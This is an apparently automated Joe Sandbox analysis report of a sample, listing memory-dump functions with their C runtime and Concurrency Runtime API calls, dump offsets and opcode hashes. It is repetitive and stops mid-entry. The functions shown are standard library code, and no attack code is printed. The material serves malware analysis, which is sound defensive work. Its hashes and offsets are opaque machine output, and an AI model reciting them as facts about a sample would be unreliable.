Concurrency::location::_Assign.LIBCMT ref: 02492BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02492BCF

Part of subcall function 02488687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024886A8
Part of subcall function 02488687: Hash.LIBCMT ref: 024886E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02492BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02492BF8

Part of subcall function 0248F6DF: Hash.LIBCMT ref: 0248F6F1

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: 9818fd9ac03129c5d6a493833d4a97d73fd284c24edb29e5508bc53965df0ce4
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: B8118E76410204AFCB15EF65C880ACAFBF9BF59320F014A5FE9568B551DBB0E904CBA0

Function 02492B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02492BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02492BCF

Part of subcall function 02488687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024886A8
Part of subcall function 02488687: Hash.LIBCMT ref: 024886E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02492BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02492BF8

Part of subcall function 0248F6DF: Hash.LIBCMT ref: 0248F6F1

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: 3ec0b07585b12f697fd9bc3453e88e054a5cfdc7649a1191d919e1ccde2fc13a
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 33012976410604ABCB24EF66C881EDAF7E9FF48320F008A1EE55A87650DBB0F944CF60

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 024750CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 024750D1

Part of subcall function 0247BDAE: __EH_prolog3_GS.LIBCMT ref: 0247BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0247511C
__Getcoll.LIBCPMT ref: 0247512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0247513B

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 241021b39ed5283bc16d49de6027d1b95f759a6a168da68b97e6a5a38c3c5984
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: AA015371920208AFEB00EFA5C480BDDB7B1FF54316F50802ED465AB280CBB49988CF91

Function 02475B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02475B8D

Part of subcall function 0247BDAE: __EH_prolog3_GS.LIBCMT ref: 0247BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 02475BD8
__Getcoll.LIBCPMT ref: 02475BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02475BF7

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 8d215c1775b953af9906a528ed44feb6b412121d06d2ac5772888c845cf6d0a3
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: B00165719102089FDB00EFA5C480BEDB7B1BF14319F10842FD469AF280CBB89988CF90

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 0248C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C1A4

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 9637257fbe7917bdb9b89250c74eea444ac72701f57a4c3a519b253b9b5d5a35
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 1D01EF3A024109ABDF1BAE94DCC18BE3B66AB29650F088417F91884120D332C6B1AEA1

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 02483773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0248378C

Part of subcall function 02482B16: ___crtGetTimeFormatEx.LIBCMT ref: 02482B2C
Part of subcall function 02482B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02482B4B

GetLastError.KERNEL32 ref: 024837A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024837BE
__CxxThrowException@8.LIBVCRUNTIME ref: 024837CC

Part of subcall function 024828EC: SetThreadPriority.KERNEL32(?,?), ref: 024828F8

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: e51a998379e4b3c636d34c8559c38a4a408a90c82ab74436e28557c2a3370fe2
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 29F0A7B2A102153AE720FB769C06FBF3A9C9B01B51F50496BBD45E7181EED8D4048AB8

Function 0247D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02481342

Part of subcall function 02480BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02480BD6
Part of subcall function 02480BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02480BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02481355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02481361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0248136A

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: d4842b68a2eb84245293d0a70945d3623d9e5558dd8407c15733678881363b1e
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: 5EF0B431621704A7AF147EB608105BE31975F51324B04416FE52A9F380DEB59E069A94

Function 0248D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0248D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0248D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0248D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0248D0CD

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 94217204aee43c245b57ddc909e2e4abb0a71c09cbc103126ec9398bb114652a
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 41F05931E11204E3C724FB66D840C9EB37A8E92B18770856FD805172C5DB31A94ACE62

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 02475A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 02475A83
__Cnd_signal.LIBCPMT ref: 02475A8F
std::_Cnd_initX.LIBCPMT ref: 02475AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02475AAB

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 1d93e98a7279ee29cd4f44be268100be2dcdc93a5e947aa8c804c8063abbf2d6
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6FF0EC71410700DFEB317773D8057DA73A6AF01328F14451FD0795A990CFB5E8145E55

Function 02482858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0248286F
GetLastError.KERNEL32(?,?,?,?,02488830,?,?,?,?,00000000,?,00000000), ref: 0248287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482894
__CxxThrowException@8.LIBVCRUNTIME ref: 024828A2

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 70a05af022c638a1edb475b4b130ff98d0fbfffb5b6052c80cb2eb65102ab050
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 45F0303550014ABBCF10FFA5CD45EAF37B86B00751F600656B915E61A0DB75D6049B64

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 0248257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02482593
GetLastError.KERNEL32(?,?,?,?,?,02480DA0), ref: 024825A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024825B7
__CxxThrowException@8.LIBVCRUNTIME ref: 024825C5

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 452940a9c2cbff8c27988d2a34783926729a1d1a02ba9c90c1676f6da1e7dfaf
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 78E0D87165025539E710F77A4C12F7F36DC5B00B41F440956BD15E11C1FFD4D10049B8

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 02489530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02482959: TlsAlloc.KERNEL32(?,02480DA0), ref: 0248295F

TlsAlloc.KERNEL32(?,02480DA0), ref: 02493BE6
GetLastError.KERNEL32 ref: 02493BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02493C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 02493C1C

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: c75cf1be0ba8b0ebd8faa3945242bf4a786f4bab695e1ced4cc2fe62c022bf4c
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: 47E06834500202AFCB00FF779C49A7F3E686A023017100E6BE525D21A1EF34D0068EAC

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B39,?,?,?,00000000), ref: 00412537
GetLastError.KERNEL32(?,?,?,00000000), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 02482794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,02480DA0,?,?,?,00000000), ref: 0248279E
GetLastError.KERNEL32(?,?,?,00000000), ref: 024827AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024827C3
__CxxThrowException@8.LIBVCRUNTIME ref: 024827D1

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 3a004793667cdad15ed708c278e2eb265b6b293adbb13b2d4906a12d889341ec
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: B0E08074510149A7CB00FBB6DD45EAF77BC6A00B05B600566A541E3190EB64D7048B79

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
